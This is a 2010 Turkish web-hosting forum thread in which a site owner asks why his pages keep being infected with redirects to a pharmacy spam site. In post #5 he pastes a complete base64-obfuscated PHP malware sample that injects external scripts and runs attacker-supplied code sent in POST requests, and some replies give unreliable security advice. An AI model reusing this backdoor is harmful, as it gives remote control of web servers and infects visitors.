• 26-07-2010, 14:50:13
    #1
    Üyeliği durduruldu
    hiccup40.html
    castle21.html
    hiccup40.html

    içeriğinde : <html><head><script>location = 'http://dedcanadadrugs.com/';</script></head></html>
    kodu yazıyor

    bu gördüğünüz tipten virüsler
    son 1 aydır serverimde geziyor

    işin garibi kendi bilgisayarımda virüs yok
    ve bu ftp sadece bende var başka bir pc de yok
    şifreleride ftp den girerken kaydetmiyorum
    file zilla kullanıyorum

    kendi bilgisayarımda virüs olmadığına %100 eminim
    msconfig de de hiçbirşey yok tertemiz
    nod32 ve antimalware ile de taradım hiçbirşey yok

    belli başlı sitelerime hep bu virüsler geliyor
    chmod normal dosyalar 644
    klasörler 755

    linux centos 5
    full update de yaptım kernel vs de güncel yum update ile de güncelledim
    siliyorum ilgili dosyaları yarın bakıyorum tekrar orda
    açıkcası
    şöyle bir ilginç olay
    hiçbir anasayfama index.php filan kesinlikle bulaşmıyor sadece adam hacklink atmış gibi birşey söz konusu

    açıkcası bunaldım ne gibi bir önlem almalıyız nasıl düzeltebilriiz hatamız nedir?
    WHMCS lisanslı yazılım kullanıyorum aktiftema yazılımı lisanslı kullanıyorum
    lisanssız null bir program yok
    'http://dedcanadadrugs.com/ bu siteyi nasıl kapattırabiliriz
    datacenteri nerede bunların ilgili datacentere ne gibi yorum yazmalıyız ki kapattıralım

    php ini güvenliği olarak
    disable functions bölümüne o gerekli tüm kodları yazdım
    disable ettim onlada ilgili bir sorun yok

    hatta bildiğimiz kb3.php ( ioncube ile şifrelenmiş bir shell script ) onuda servere attım denedim kesinlikle ilgili ftp klasörü hariç hiçbir üst klasöre geçemiyoruz hiçbir işlem yaptırmıyor güvenli duruyor

    sizce sorun ne olabilir nereden bulaşıyor bu illet sizce?

    SAygılarımla
  • 27-07-2010, 02:24:17
    #2
    Üyeliği durduruldu
    FTP Şifreni değiştir, siteye ftp girişi yaptığın tüm bilgisayarları Kaspersky Antivirüs ile taratıp virüs olmadığından emin olduktan sonra gir ftpye.

    Nod32 filan kar etmiyor, tek çözümü Kaspersky
  • 27-07-2010, 09:49:40
    #3
    Üyeliği durduruldu
    tşk
    bilgisayarımda virüs olduğunu sanmıyorum her ftp ye bulaşmıyor bu illet
    belli birkaç sitemde var

    sizce sebebi ne olabilir?
  • 27-07-2010, 14:35:00
    #4
    Üyeliği durduruldu
    performansodev adlı üyeden alıntı: mesajı görüntüle
    tşk
    bilgisayarımda virüs olduğunu sanmıyorum her ftp ye bulaşmıyor bu illet
    belli birkaç sitemde var

    sizce sebebi ne olabilir?
    Sebebini ve çözümünü söyledim. Acilen ftp şifrelerini değiştir, Kaspersky Antivirüs olmayan bilgisayardan sitenin ftpsine girme, bir daha sorun yaşamazsın.
  • 27-07-2010, 15:00:08
    #5
    Üyeliği durduruldu
    evet haklıymışsın kaspersky ile taradım 50 ye yakın virüs cikti
    Bu co-cuce server files dosyaları vardı
    servere indirmiştim
    vps oyun server kurmak için hep onların içinden cikti bu virüsler
    ne zamandır bu virüsler ile uğraşıyorum

    kaynağı oymuş belli oldu
    nod 32 bi halta yaramadı
    kasper 2011 yükledim internet security
    gayet başarılı 30 gün deneme sürümü var ztn
    gayet güzel oldu

    <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndD d4bGYnKSl7ZnVuY3Rpb24gdDd4bGYoJHMpe2lmKHByZWdfbWF0 Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcy wkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9k ZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW1 5cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8 fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLC R2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYo JGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJi ZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9y ZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJy M8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcm VnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlsw LTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJi Yhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZS gkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1z dHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2 RDQnpjbU05YUhSMGNEb3ZMMjl5WW1WbGN5NWpiMjB2YzNObWJT OXZjbUpsWlhNdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJH MpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBs YWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbH NlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRz O31mdW5jdGlvbiB0N3hsZjIoJGEsJGIsJGMsJGQpe2dsb2JhbC R0N3hsZjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMo JHQ3eGxmMSkpY2FsbF91c2VyX2Z1bmMoJHQ3eGxmMSwkYSwkYi wkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYp aWYoKCRhPSR2WyduYW1lJ10pPT0ndDd4bGYnKXJldHVybjtlbH NlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1td PWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS 0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5k X2NsZWFuKCk7fW9iX3N0YXJ0KCd0N3hsZicpO2ZvcigkaT0wOy RpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0p O2VjaG8gJHNbJGldWzFdO319fSR0N3hsZmw9KCgkYT1Ac2V0X2 Vycm9yX2hhbmRsZXIoJ3Q3eGxmMicpKSE9J3Q3eGxmMicpPyRh OjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7') ); ?><?php
    header("Location: ../index.php");
    ?>
    şeklinde
    64 bit şifrelenmiş virüsler cikti
    yeni dikkat ettim

    vay bea adamlar kendini geliştirmiş 64 bit şifreleyerek artık virüsleri yerleştiriyorlar oda güzel herkes dikkat etsin
  • 03-08-2010, 14:47:55
    #6
    Bazı hosting firmalarında 1 siteye bulaşan virüs trojen worm solucan tüm hesaplarada geçebiliyor bu hizmet aldığınız firmanında kalite ve güvenliğinede bakar.
  • 03-08-2010, 17:28:47
    #7
    Üyeliği durduruldu
    oNuRkAn adlı üyeden alıntı: mesajı görüntüle
    Bazı hosting firmalarında 1 siteye bulaşan virüs trojen worm solucan tüm hesaplarada geçebiliyor bu hizmet aldığınız firmanında kalite ve güvenliğinede bakar.

    Sunucu linux ise dediğin şeyin olması mümkün değil, windows ise kalkıp sistem yöneticisi sunucuya uzak masaüstü ile bağlanıp bu virüsü sunucuya bulaştırırsa ancak sunucudaki web sayfalarına bulaştırabilir.
  • 03-08-2010, 18:13:11
    #8
    cemoka adlı üyeden alıntı: mesajı görüntüle
    Sunucu linux ise dediğin şeyin olması mümkün değil, windows ise kalkıp sistem yöneticisi sunucuya uzak masaüstü ile bağlanıp bu virüsü sunucuya bulaştırırsa ancak sunucudaki web sayfalarına bulaştırabilir.
    mümkün değilmi bazı .css uzantılı virüs ve trojenler var hiç onlarla karşı karşıya gelmedin sanırım gelirsen ne demek istediğimi anlarsın. Tabi benim ordaki dediğim olay sunucu güvenliği ile alakalı tedbir alırsan böyle birşey olmaz.
  • 03-08-2010, 21:17:10
    #9
    Sorunun bilgisayardan olup olmadığını anlamanın kolay bir yolu var. Ftp şifresini değiştirip virüslü dosyaları panelden temiz olanları ile değiştirmek. Daha sonrasında sabırla bekleyip bulaşıp bulaşmadığını görürsün.